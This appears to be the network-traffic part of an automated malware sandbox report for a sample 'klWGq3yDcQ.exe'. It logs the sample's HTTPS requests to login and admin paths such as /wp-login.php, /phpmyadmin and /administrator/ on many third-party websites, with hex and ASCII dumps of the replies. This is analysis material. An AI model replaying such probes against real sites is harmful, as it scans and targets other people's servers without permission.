                                                                                                                                                                                                    2023-11-26 05:59:35 UTC1099INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6b 46 50 61 6c 70 54 52 47 35 72 64 6d 55 78 55 6d 4e 70 56 56 4d 79 56 57 39 56 4c 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 6d 4e 35 56 6a 42 45 4e 30 64 6f 5a 6d 78 45 64 57 4e 4e 4f 58 68 32 52 56 46 6f 55 7a 4e 6a 62 30 70 48 63 45 64 4e 5a 44 5a 32 61 79 39 7a 61 57 6c 61 64 6a 42 35 62 6d 74 6f 4d 6b 35 48 63 54 6c 6f 65 57 5a 42
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:35 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6IkFPalpTRG5rdmUxUmNpVVMyVW9VL0E9PSIsInZhbHVlIjoiVmN5VjBEN0doZmxEdWNNOXh2RVFoUzNjb0pHcEdNZDZ2ay9zaWladjB5bmtoMk5HcTloeWZB


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    166192.168.2.458881172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC813INData Raw: 32 32 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 2277<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8018INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    167192.168.2.45889734.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC175OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC922INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 34 2e 36 36 38 31 30 33 32 38 35 37 39 33 35 36 38 35 31 35 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 53 65 72 76 65 72 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978374.6681032857935685150Cache-Control: public,max-age=0,must-revalidateServer:
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC330INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1252INData Raw: 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74
                                                                                                                                                                                                    Data Ascii: ame="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" t
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1252INData Raw: 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6c 6f 63 61 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: ate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/app.js"></scrip
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC31INData Raw: 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: rification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    168192.168.2.458848104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    169192.168.2.458761185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC181OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC310INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:34 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    170192.168.2.458804213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC245OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.ceuandalucia.es/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC468INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressLocation: https


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    171192.168.2.459013185.54.192.1254436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC270OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=k11oabf2270bqa8id9iv53haoo
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://talentius.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC385INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:35 GMTServer: Apache/2.4.52 (Ubuntu)Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://talentius.com/wp-json/>; rel="https:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC7807INData Raw: 31 66 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: 1f06<!DOCTYPE html><html lang="es-ES" class="no-js"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC141INData Raw: 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 77 69 64 67 65 74 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79
                                                                                                                                                                                                    Data Ascii: /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script><script type='text/javascript' src='https://talentius.com/wp-includes/js/jquery
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 31 66 66 38 0d 0a 2f 75 69 2f 6d 6f 75 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 64 72 61 67 67 61 62 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 64 72 6f 70 70
                                                                                                                                                                                                    Data Ascii: 1ff8/ui/mouse.min.js?ver=1.11.4'></script><script type='text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script><script type='text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/dropp
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC6INData Raw: 31 66 66 38 0d 0a
                                                                                                                                                                                                    Data Ascii: 1ff8
